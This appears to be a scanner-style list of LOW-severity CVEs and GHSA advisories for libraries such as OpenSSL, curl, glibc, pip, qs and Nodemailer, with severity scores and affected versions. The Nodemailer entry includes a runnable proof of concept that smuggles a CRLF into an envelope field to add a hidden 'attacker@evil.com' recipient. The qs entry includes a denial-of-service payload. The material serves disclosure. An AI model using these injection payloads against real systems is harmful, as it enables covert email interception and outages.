            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-3479DISPUTED: The project has clarified that the documentation was incorrect, and that pkgutil.get_data() has the same security model as open(). The documentation has been updated to clarify this point. There is no vulnerability in the function if following the intended security model. pkgutil.get_data() did not validate the resource argument as documented, allowing path traversals.LOW

            NVD: n/a

            RedHat: 3.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2021-3572A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.LOW

            NVD: 5.7

            RedHat: 4.5

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2023-5752When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.LOW

            NVD: 3.3

            RedHat: 3.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2024-0232A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.LOW

            NVD: 5.5

            RedHat: 4.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-70873An information disclosure issue in the zipfileInflate function in the zipfile extension in SQLite v3.51.1 and earlier allows attackers to obtain heap memory via supplying a crafted ZIP file.LOW

            NVD: n/a

            RedHat: 3.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-27171zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.LOW

            NVD: 5.5

            RedHat: 3.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-3449Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.LOW

            NVD: n/a

            RedHat: 4

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
              GHSA-c7w3-x93f-qmm8### Summary When a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\r\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails. ### Details In `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization: ```javascript if (this._envelope.size && this._supportedExtensions.includes('SIZE')) { args.push('SIZE=' + this._envelope.size); } ``` This contrasts with other envelope parameters in the same function that ARE properly sanitized: - **Addresses** (`from`, `to`): validated for `[\r\n<>]` at lines 1107-1127 - **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183 The `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim: ```javascript const standardFields = ['to', 'cc', 'bcc', 'from']; Object.keys(envelope).forEach(key => { if (!standardFields.includes(key)) { this._envelope[key] = envelope[key]; } }); ``` Since `_sendCommand()` writes the command string followed by `\r\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command. Note: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. While this limits the attack surface, applications that expose envelope configuration to users are affected. ### PoC ave the following as `poc.js` and run with `node poc.js`: ```javascript const net = require('net'); const nodemailer = require('nodemailer'); // Minimal SMTP server that logs raw commands const server = net.createServer(socket => { socket.write('220 localhost ESMTP\r\n'); let buffer = ''; socket.on('data', chunk => { buffer += chunk.toString(); const lines = buffer.split('\r\n'); buffer = lines.pop(); for (const line of lines) { if (!line) continue; console.log('C:', line); if (line.startsWith('EHLO')) { socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n'); } else if (line.startsWith('MAIL FROM')) { socket.write('250 OK\r\n'); } else if (line.startsWith('RCPT TO')) { socket.write('250 OK\r\n'); } else if (line === 'DATA') { socket.write('354 Start\r\n'); } else if (line === '.') { socket.write('250 OK\r\n'); } else if (line.startsWith('QUIT')) { socket.write('221 Bye\r\n'); socket.end(); } } }); }); server.listen(0, '127.0.0.1', () => { const port = server.address().port; console.log('SMTP server on port', port); console.log('Sending email with injected RCPT TO...\n'); const transporter = nodemailer.createTransport({ host: '127.0.0.1', port, secure: false, tls: { rejectUnauthorized: false }, }); transporter.sendMail({ from: 'sender@example.com', to: 'recipient@example.com', subject: 'Normal email', text: 'This is a normal email.', envelope: { from: 'sender@example.com', to: ['recipient@example.com'], size: '100\r\nRCPT TO:<attacker@evil.com>', }, }, (err) => { if (err) console.error('Error:', err.message); console.log('\nExpected output above:'); console.log(' C: MAIL FROM:<sender@example.com> SIZE=100'); console.log(' C: RCPT TO:<attacker@evil.com> <-- INJECTED'); console.log(' C: RCPT TO:<recipient@example.com>'); server.close(); transporter.close(); }); }); ``` **Expected output:** ``` SMTP server on port 12345 Sending email with injected RCPT TO... C: EHLO [127.0.0.1] C: MAIL FROM:<sender@example.com> SIZE=100 C: RCPT TO:<attacker@evil.com> C: RCPT TO:<recipient@example.com> C: DATA ... C: . C: QUIT ``` The `RCPT TO:<attacker@evil.com>` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email. ### Impact This is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can: - **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport - **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server) - **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery The severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable. Affected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.LOW

              NVD: n/a

              RedHat: n/a

              • 9.4.0
              • 9.3.4
              • 9.3.3
              • 9.3.2
              • 9.3.1
                CVE-2024-2236A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.LOW

                NVD: n/a

                RedHat: 5.9

                • 8.19.15
                • 8.19.14
                • 8.19.13
                • 8.19.12
                • 8.19.11
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2024-56433shadow-utils (aka shadow) 4.4 through 4.17.0 establishes a default /etc/subuid behavior (e.g., uid 100000 through 165535 for the first user account) that can realistically conflict with the uids of users defined on locally administered networks, potentially leading to account takeover, e.g., by leveraging newuidmap for access to an NFS home directory (or same-host resources in the case of remote logins by these local network users). NOTE: it may also be argued that system administrators should not have assigned uids, within local networks, that are within the range that can occur in /etc/subuid.LOW

                NVD: n/a

                RedHat: 3.6

                • 9.2.1
                • 9.2.0
                • 9.1.7
                • 9.1.6
                • 9.1.5
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2026-42040Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the encode() function in lib/helpers/AxiosURLSearchParams.js contains a character mapping (charMap) at line 21 that reverses the safe percent-encoding of null bytes. After encodeURIComponent('\x00') correctly produces the safe sequence %00, the charMap entry '%00': '\x00' converts it back to a raw null byte. Primary impact is limited because the standard axios request flow is not affected. This vulnerability is fixed in 1.15.1 and 0.31.1.LOW

                NVD: n/a

                RedHat: n/a

                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                • 9.3.0
                • 9.4.0
                GHSA-442j-39wm-28r2## Summary In `lib/handlebars/runtime.js`, the `container.lookup()` function uses `container.lookupProperty()` as a gate check to enforce prototype-access controls, but then discards the validated result and performs a second, unguarded property access (`depths[i][name]`). This Time-of-Check Time-of-Use (TOCTOU) pattern means the security check and the actual read are decoupled, and the raw access bypasses any sanitization that `lookupProperty` may perform. Only relevant when the **compat** compile option is enabled (`{compat: true}`), which activates `depthedLookup` in `lib/handlebars/compiler/javascript-compiler.js`. ## Description The vulnerable code in `lib/handlebars/runtime.js` (lines 137–144): ```javascript lookup: function (depths, name) { const len = depths.length; for (let i = 0; i < len; i++) { let result = depths[i] && container.lookupProperty(depths[i], name); if (result != null) { return depths[i][name]; // BUG: should be `return result;` } } }, ``` `container.lookupProperty()` (lines 119–136) enforces `hasOwnProperty` checks and `resultIsAllowed()` prototype-access controls. However, `container.lookup()` only uses `lookupProperty` as a boolean gate — if the gate passes (`result != null`), it then performs an independent, raw `depths[i][name]` access that circumvents any transformation or wrapped value that `lookupProperty` may have returned. ## Workarounds - Avoid enabling `{ compat: true }` when rendering templates that include untrusted data. - Ensure context data objects are plain JSON (no Proxies, no getter-based accessor properties).LOW

                NVD: n/a

                RedHat: n/a

                • 9.3.3
                • 9.3.2
                • 9.3.1
                • 9.3.0
                • 9.2.8
                • 9.4.0
                • 9.3.4
                • 8.19.15
                CVE-2026-34166LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.3, the replace filter in LiquidJS incorrectly accounts for memory usage when the memoryLimit option is enabled. It charges str.length + pattern.length + replacement.length bytes to the memory limiter, but the actual output from str.split(pattern).join(replacement) can be quadratically larger when the pattern occurs many times in the input string. This allows an attacker who controls template content to bypass the memoryLimit DoS protection with approximately 2,500x amplification, potentially causing out-of-memory conditions. This vulnerability is fixed in 10.25.3.LOW

                NVD: 5.3

                RedHat: n/a

                • 9.3.3
                • 9.3.2
                • 9.3.1
                • 9.3.0
                • 9.4.0
                • 9.3.4
                • 9.2.8
                • 9.2.7
                • 9.2.6
                CVE-2026-27942fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. Prior to version 5.3.8, the application crashes with stack overflow when user use XML builder with `preserveOrder:true`. Version 5.3.8 fixes the issue. As a workaround, use XML builder with `preserveOrder:false` or check the input data before passing to builder.LOW

                NVD: 7.5

                RedHat: 7.5

                • 9.3.2
                • 9.3.1
                • 9.3.0
                • 9.2.7
                • 9.2.6
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.2.8
                • 8.19.15
                CVE-2025-9820A flaw was found in the GnuTLS library, specifically in the gnutls_pkcs11_token_init() function that handles PKCS#11 token initialization. When a token label longer than expected is processed, the function writes past the end of a fixed-size stack buffer. This programming error can cause the application using GnuTLS to crash or, in certain conditions, be exploited for code execution. As a result, systems or applications relying on GnuTLS may be vulnerable to a denial of service or local privilege escalation attacks.LOW

                NVD: n/a

                RedHat: 4

                • 9.3.1
                • 9.3.0
                • 9.2.6
                • 9.2.5
                • 9.2.4
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.2.8
                CVE-2026-2391### Summary The `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284). ### Details When the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `['a', 'b', 'c']`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation. **Vulnerable code** (lib/parse.js: lines ~40-50): ```js if (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {     return val.split(','); } if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {     throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.'); } return val; ``` The `split(',')` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p). ### PoC **Test 1 - Basic bypass:** ``` npm install qs ``` ```js const qs = require('qs'); const payload = 'a=' + ','.repeat(25); // 26 elements after split (bypasses arrayLimit: 5) const options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true }; try {   const result = qs.parse(payload, options);   console.log(result.a.length); // Outputs: 26 (bypass successful) } catch (e) {   console.log('Limit enforced:', e.message); // Not thrown } ``` **Configuration:** - `comma: true` - `arrayLimit: 5` - `throwOnLimitExceeded: true` Expected: Throws "Array limit exceeded" error. Actual: Parses successfully, creating an array of length 26. ### Impact Denial of Service (DoS) via memory exhaustion.LOW

                NVD: 7.5

                RedHat: 5.3

                • 9.3.1
                • 9.3.0
                • 9.2.6
                • 9.2.5
                • 9.2.4
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.2.8
                CVE-2025-0167When asked to use a `.netrc` file for credentials **and** to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances. This flaw only manifests itself if the netrc file has a `default` entry that omits both login and password. A rare circumstance.LOW

                NVD: n/a

                RedHat: n/a

                • 8.19.12
                • 8.19.11
                • 8.19.10
                • 8.19.9
                • 8.19.8
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-10148curl's websocket code did not update the 32 bit mask pattern for each new outgoing frame as the specification says. Instead it used a fixed mask that persisted and was used throughout the entire connection. A predictable mask pattern allows for a malicious server to induce traffic between the two communicating parties that could be interpreted by an involved proxy (configured or transparent) as genuine, real, HTTP traffic with content and thereby poison its cache. That cached poisoned content could then be served to all users of that proxy.LOW

                NVD: n/a

                RedHat: 4.8

                • 8.19.12
                • 8.19.11
                • 8.19.10
                • 8.19.9
                • 8.19.8
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-15281Calling wordexp with WRDE_REUSE in conjunction with WRDE_APPEND in the GNU C Library version 2.0 to version 2.42 may cause the interface to return uninitialized memory in the we_wordv member, which on subsequent calls to wordfree may abort the process.LOW

                NVD: n/a

                RedHat: 5.9

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2026-0861Passing too large an alignment to the memalign suite of functions (memalign, posix_memalign, aligned_alloc) in the GNU C Library version 2.30 to 2.42 may result in an integer overflow, which could consequently result in a heap corruption. Note that the attacker must have control over both, the size as well as the alignment arguments of the memalign function to be able to exploit this. The size parameter must be close enough to PTRDIFF_MAX so as to overflow size_t along with the large alignment argument. This limits the malicious inputs for the alignment for memalign to the range [1<<62+ 1, 1<<63] and exactly 1<<63 for posix_memalign and aligned_alloc. Typically the alignment argument passed to such functions is a known constrained quantity (e.g. page size, block size, struct sizes) and is not attacker controlled, because of which this may not be easily exploitable in practice. An application bug could potentially result in the input alignment being too large, e.g. due to a different buffer overflow or integer overflow in the application or its dependent libraries, but that is again an uncommon usage pattern given typical sources of alignments.LOW

                NVD: n/a

                RedHat: 8.1

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-15468Issue summary: If an application using the SSL_CIPHER_find() function in a QUIC protocol client or server receives an unknown cipher suite from the peer, a NULL dereference occurs. Impact summary: A NULL pointer dereference leads to abnormal termination of the running process causing Denial of Service. Some applications call SSL_CIPHER_find() from the client_hello_cb callback on the cipher ID received from the peer. If this is done with an SSL object implementing the QUIC protocol, NULL pointer dereference will happen if the examined cipher ID is unknown or unsupported. As it is not very common to call this function in applications using the QUIC protocol and the worst outcome is Denial of Service, the issue was assessed as Low severity. The vulnerable code was introduced in the 3.2 version with the addition of the QUIC protocol support. The FIPS modules in 3.6, 3.5, 3.4 and 3.3 are not affected by this issue, as the QUIC implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4 and 3.3 are vulnerable to this issue. OpenSSL 3.0, 1.1.1 and 1.0.2 are not affected by this issue.LOW

                NVD: n/a

                RedHat: 5.9

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-15469Issue summary: The 'openssl dgst' command-line tool silently truncates input data to 16MB when using one-shot signing algorithms and reports success instead of an error. Impact summary: A user signing or verifying files larger than 16MB with one-shot algorithms (such as Ed25519, Ed448, or ML-DSA) may believe the entire file is authenticated while trailing data beyond 16MB remains unauthenticated. When the 'openssl dgst' command is used with algorithms that only support one-shot signing (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), the input is buffered with a 16MB limit. If the input exceeds this limit, the tool silently truncates to the first 16MB and continues without signaling an error, contrary to what the documentation states. This creates an integrity gap where trailing bytes can be modified without detection if both signing and verification are performed using the same affected codepath. The issue affects only the command-line tool behavior. Verifiers that process the full message using library APIs will reject the signature, so the risk primarily affects workflows that both sign and verify with the affected 'openssl dgst' command. Streaming digest algorithms for 'openssl dgst' and library users are unaffected. The FIPS modules in 3.5 and 3.6 are not affected by this issue, as the command-line tools are outside the OpenSSL FIPS module boundary. OpenSSL 3.5 and 3.6 are vulnerable to this issue. OpenSSL 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are not affected by this issue.LOW

                NVD: n/a

                RedHat: 5.5

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-66199Issue summary: A TLS 1.3 connection using certificate compression can be forced to allocate a large buffer before decompression without checking against the configured certificate size limit. Impact summary: An attacker can cause per-connection memory allocations of up to approximately 22 MiB and extra CPU work, potentially leading to service degradation or resource exhaustion (Denial of Service). In affected configurations, the peer-supplied uncompressed certificate length from a CompressedCertificate message is used to grow a heap buffer prior to decompression. This length is not bounded by the max_cert_list setting, which otherwise constrains certificate message sizes. An attacker can exploit this to cause large per-connection allocations followed by handshake failure. No memory corruption or information disclosure occurs. This issue only affects builds where TLS 1.3 certificate compression is compiled in (i.e., not OPENSSL_NO_COMP_ALG) and at least one compression algorithm (brotli, zlib, or zstd) is available, and where the compression extension is negotiated. Both clients receiving a server CompressedCertificate and servers in mutual TLS scenarios receiving a client CompressedCertificate are affected. Servers that do not request client certificates are not vulnerable to client-initiated attacks. Users can mitigate this issue by setting SSL_OP_NO_RX_CERTIFICATE_COMPRESSION to disable receiving compressed certificates. The FIPS modules in 3.6, 3.5, 3.4 and 3.3 are not affected by this issue, as the TLS implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4 and 3.3 are vulnerable to this issue. OpenSSL 3.0, 1.1.1 and 1.0.2 are not affected by this issue.LOW

                NVD: n/a

                RedHat: 5.9

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-68160Issue summary: Writing large, newline-free data into a BIO chain using the line-buffering filter where the next BIO performs short writes can trigger a heap-based out-of-bounds write. Impact summary: This out-of-bounds write can cause memory corruption which typically results in a crash, leading to Denial of Service for an application. The line-buffering BIO filter (BIO_f_linebuffer) is not used by default in TLS/SSL data paths. In OpenSSL command-line applications, it is typically only pushed onto stdout/stderr on VMS systems. Third-party applications that explicitly use this filter with a BIO chain that can short-write and that write large, newline-free data influenced by an attacker would be affected. However, the circumstances where this could happen are unlikely to be under attacker control, and BIO_f_linebuffer is unlikely to be handling non-curated data controlled by an attacker. For that reason the issue was assessed as Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the BIO implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.LOW

                NVD: n/a

                RedHat: 4.7

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-69418Issue summary: When using the low-level OCB API directly with AES-NI or<br>other hardware-accelerated code paths, inputs whose length is not a multiple<br>of 16 bytes can leave the final partial block unencrypted and unauthenticated.<br><br>Impact summary: The trailing 1-15 bytes of a message may be exposed in<br>cleartext on encryption and are not covered by the authentication tag,<br>allowing an attacker to read or tamper with those bytes without detection.<br><br>The low-level OCB encrypt and decrypt routines in the hardware-accelerated<br>stream path process full 16-byte blocks but do not advance the input/output<br>pointers. The subsequent tail-handling code then operates on the original<br>base pointers, effectively reprocessing the beginning of the buffer while<br>leaving the actual trailing bytes unprocessed. The authentication checksum<br>also excludes the true tail bytes.<br><br>However, typical OpenSSL consumers using EVP are not affected because the<br>higher-level EVP and provider OCB implementations split inputs so that full<br>blocks and trailing partial blocks are processed in separate calls, avoiding<br>the problematic code path. Additionally, TLS does not use OCB ciphersuites.<br>The vulnerability only affects applications that call the low-level<br>CRYPTO_ocb128_encrypt() or CRYPTO_ocb128_decrypt() functions directly with<br>non-block-aligned lengths in a single call on hardware-accelerated builds.<br>For these reasons the issue was assessed as Low severity.<br><br>The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected<br>by this issue, as OCB mode is not a FIPS-approved algorithm.<br><br>OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.<br><br>OpenSSL 1.0.2 is not affected by this issue.LOW

                NVD: n/a

                RedHat: 4

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-69420Issue summary: A type confusion vulnerability exists in the TimeStamp Response verification code where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid or NULL pointer dereference when processing a malformed TimeStamp Response file. Impact summary: An application calling TS_RESP_verify_response() with a malformed TimeStamp Response can be caused to dereference an invalid or NULL pointer when reading, resulting in a Denial of Service. The functions ossl_ess_get_signing_cert() and ossl_ess_get_signing_cert_v2() access the signing cert attribute value without validating its type. When the type is not V_ASN1_SEQUENCE, this results in accessing invalid memory through the ASN1_TYPE union, causing a crash. Exploiting this vulnerability requires an attacker to provide a malformed TimeStamp Response to an application that verifies timestamp responses. The TimeStamp protocol (RFC 3161) is not widely used and the impact of the exploit is just a Denial of Service. For these reasons the issue was assessed as Low severity. The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the TimeStamp Response implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue. OpenSSL 1.0.2 is not affected by this issue.LOW

                NVD: n/a

                RedHat: 5.9

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-69421Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer dereference in the PKCS12_item_decrypt_d2i_ex() function. Impact summary: A NULL pointer dereference can trigger a crash which leads to Denial of Service for an application processing PKCS#12 files. The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct parameter is NULL before dereferencing it. When called from PKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can be NULL, causing a crash. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. Exploiting this issue requires an attacker to provide a malformed PKCS#12 file to an application that processes it. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.LOW

                NVD: 7.5

                RedHat: 6.5

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2026-22795Issue summary: An invalid or NULL pointer dereference can happen in an application processing a malformed PKCS#12 file. Impact summary: An application processing a malformed PKCS#12 file can be caused to dereference an invalid or NULL pointer on memory read, resulting in a Denial of Service. A type confusion vulnerability exists in PKCS#12 parsing code where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid pointer read. The location is constrained to a 1-byte address space, meaning any attempted pointer manipulation can only target addresses between 0x00 and 0xFF. This range corresponds to the zero page, which is unmapped on most modern operating systems and will reliably result in a crash, leading only to a Denial of Service. Exploiting this issue also requires a user or application to process a maliciously crafted PKCS#12 file. It is uncommon to accept untrusted PKCS#12 files in applications as they are usually used to store private keys which are trusted by definition. For these reasons, the issue was assessed as Low severity. The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS12 implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue. OpenSSL 1.0.2 is not affected by this issue.LOW

                NVD: n/a

                RedHat: 5.5

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2026-22796Issue summary: A type confusion vulnerability exists in the signature verification of signed PKCS#7 data where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid or NULL pointer dereference when processing malformed PKCS#7 data. Impact summary: An application performing signature verification of PKCS#7 data or calling directly the PKCS7_digest_from_attributes() function can be caused to dereference an invalid or NULL pointer when reading, resulting in a Denial of Service. The function PKCS7_digest_from_attributes() accesses the message digest attribute value without validating its type. When the type is not V_ASN1_OCTET_STRING, this results in accessing invalid memory through the ASN1_TYPE union, causing a crash. Exploiting this vulnerability requires an attacker to provide a malformed signed PKCS#7 to an application that verifies it. The impact of the exploit is just a Denial of Service, the PKCS7 API is legacy and applications should be using the CMS API instead. For these reasons the issue was assessed as Low severity. The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS#7 parsing implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.LOW

                NVD: n/a

                RedHat: 5.9

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                GHSA-6475-r3vj-m8vfCVSSv3.1 Rating: 3.7 (LOW) Summary This notification is related to the use of specific values for the region input field when calling AWS services. An actor with access to the environment in which the SDK is used could set the region input field to an invalid value. A defense-in-depth enhancement has been implemented in the AWS SDK for JavaScript v3 (versions 3.723.0 and later). This enhancement validates that a region used to construct an endpoint URL is a valid host label. The change was released on November 15, 2025. This advisory is informational to help customers understand their responsibilities regarding configuration security. Impact Customer applications could be configured to improperly route AWS API calls to non-existent or non-AWS hosts. While the SDK was functioning as designed, additional safeguards have been added to support secure customer implementations. Impacted versions: @smithy/config-resolver <4.4.0 Patches On November 15, 2025, an enhancement was made to the AWS SDK for JavaScript v3 (versions 3.723.0 and later) release, which validates the formatting of a region, providing additional safeguards. A feature enhancement was implemented in @smithy/config-resolver v4.4.0. This enhancement provides additional configuration validation safeguards but does not address a security vulnerability. Workarounds No workarounds are needed, but as always you should ensure that your application is following security best practices: - Implement proper input validation in your application code - Update to the latest AWS SDK for Javascript v3 release on a regular basis - Follow AWS security best practices [1] for SDK configuration Resources Contact AWS Security via the vulnerability reporting page or email [aws-security@amazon.com](mailto:aws-security@amazon.com). Acknowledgement AWS Security thanks Guy Arazi for bringing these customer security considerations to our attention through the coordinated disclosure process. [1] https://docs.aws.amazon.com/sdk-for-javascript/v3/developer-guide/security.htmlLOW

                NVD: n/a

                RedHat: n/a

                • 9.3.0
                • 9.2.5
                • 9.2.4
                • 9.2.3
                • 9.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
